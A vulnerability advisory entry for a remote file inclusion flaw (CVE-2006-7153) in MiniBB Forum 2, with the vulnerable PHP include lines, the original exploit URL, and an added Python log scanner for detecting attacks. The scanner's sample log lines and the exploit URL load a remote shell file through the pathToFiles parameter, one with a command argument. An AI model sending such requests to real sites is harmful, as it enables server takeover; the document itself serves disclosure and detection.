MiniBB Forum index.php Remote File Inclusion Vulnerability

Vulnerability ID: 1191389    Vulnerability type: Unknown
Published: 2007-03-07    Updated: 2007-03-07
CVE: CVE-2006-7153    CNNVD ID: CNNVD-200703-263
Platform: N/A    CVSS score: 10.0
|Sources
https://www.securityfocus.com/bid/83574
https://cxsecurity.com/issue/WLB-2007030069
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-263
|Vulnerability details
index.php in MiniBB Forum 2 contains a PHP remote file inclusion vulnerability. A remote attacker can execute arbitrary code by supplying a URL in the pathToFiles parameter. The script builds its include() targets by concatenating $pathToFiles with fixed file names (see the vulnerable code in the exploit section); with PHP's register_globals enabled the request parameter sets that variable, and with allow_url_fopen (allow_url_include on PHP 5.2 and later) enabled include() fetches and executes the attacker's file from the remote server.
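As an added example (not code from the original advisory or from MiniBB), the Python below models the four include() calls quoted in the exploit section to show what PHP would load for a given pathToFiles value and why the payload ends in a '?', and then scans constructed Apache combined-format access-log lines for requests that carry a URL in that parameter. The hostnames, addresses, log lines and function names are assumptions made for this example.

```python
"""Added example, not code from the original advisory or from MiniBB.

Models the include() lines quoted in the advisory to show what PHP would
load when pathToFiles is taken from the query string, and scans Apache
combined-format access-log lines for requests that try it.  The hostnames,
addresses and log lines are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# File names index.php appends to $pathToFiles (the advisory's vulnerable lines).
INCLUDED_FILES = ("setup_{db}.php", "bb_cookie.php", "bb_functions.php", "bb_specials.php")
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def include_targets(path_to_files, db="mysql"):
    """The four strings include() receives for a given $pathToFiles value.

    With register_globals enabled, ?pathToFiles=... sets $pathToFiles before
    index.php uses it, so the attacker controls the prefix of every include.
    """
    return [path_to_files + name.format(db=db) for name in INCLUDED_FILES]


def is_remote_include(target):
    """True when PHP (allow_url_fopen / allow_url_include on) would fetch over the network."""
    return target.lower().startswith(REMOTE_SCHEMES)


def fetched_url_parts(target):
    """Why the exploit ends pathToFiles with '?': the appended file name lands
    in the query string, so the attacker's server returns Shell.txt unchanged."""
    u = urlsplit(target)
    return u.netloc, u.path, u.query


# Apache combined log format; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def find_rfi_attempts(lines, params=("pathToFiles",)):
    """Return (ip, timestamp, param, value) for requests whose include-path
    parameter carries a URL.  parse_qs percent-decodes values, so the
    'http%3A%2F%2F...' form is caught as well as the plain one."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("uri")).query
        for name, values in parse_qs(query).items():
            if name not in params:
                continue
            for value in values:
                if is_remote_include(value):
                    hits.append((m.group("ip"), m.group("ts"), name, value))
    return hits


# Constructed sample: one normal request, two exploit attempts, one local value.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Mar/2007:10:12:31 +0000] "GET /forum/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [07/Mar/2007:10:13:02 +0000] "GET /forum/index.php?pathToFiles=http://203.0.113.9/Shell.txt? HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [07/Mar/2007:10:13:05 +0000] "GET /forum/index.php?pathToFiles=http%3A%2F%2F203.0.113.9%2FShell.txt%3F&cmd=id HTTP/1.1" 200 812 "-" "curl/7.15.5"',
    '10.0.0.8 - - [07/Mar/2007:10:14:40 +0000] "GET /forum/index.php?action=search&pathToFiles=./ HTTP/1.1" 200 4010 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for target in include_targets("http://203.0.113.9/Shell.txt?"):
        print(target, "(remote)" if is_remote_include(target) else "(local)")
    print("server receives:", fetched_url_parts(include_targets("http://203.0.113.9/Shell.txt?")[0]))
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print("RFI attempt:", hit)
```

The log check flags only values that begin with a URL scheme; the fourth sample line (pathToFiles=./) is not reported, although any externally supplied value for that parameter is worth reviewing because the same include() also allows local path manipulation.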
|Exploit
Title : MiniBB Forum <= 2 Remote File Include (index.php)
###############################################################################
Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}

------------------------------------------------------------------------

Source Code:
http://www.minibb.net/download.php?file=minibb20
-----

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : MiniBB Forum 2 (index.php)
Version : 2
Exploit : Remote File Include
------------------------------------------------------------------------

-----
Vulnerable Code:
// $pathToFiles is set from the request when register_globals is on and is used unvalidated as the include prefix
include ($pathToFiles.'setup_'.$DB.'.php');
include ($pathToFiles.'bb_cookie.php');
include ($pathToFiles.'bb_functions.php');
include ($pathToFiles.'bb_specials.php');
----------------------------------------------------------------------
Exploit:
http://www.VicTim.com/[Script_Path]/index.php?pathToFiles=Shell.txt?

------------------------------------------------------------------------

----

greetz: Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco

Special Greeting:AsbMay's Group

channel:www.asb-may.net

contact:spoonman500[at]hotmail[dot]com

|Affected products
MiniBB Forum 2
|References

Source: XF
Name: minibb-index-file-include(30253)
Link: http://xforce.iss.net/xforce/xfdb/30253

Source: BUGTRAQ
Name: 20061113 New Bug MiniBB Forum <= 2 Remote File Include (index.php)
Link: http://www.securityfocus.com/archive/1/archive/1/451402/100/0/threaded

Source: SREASON
Name: 2371
Link: http://securityreason.com/securityalert/2371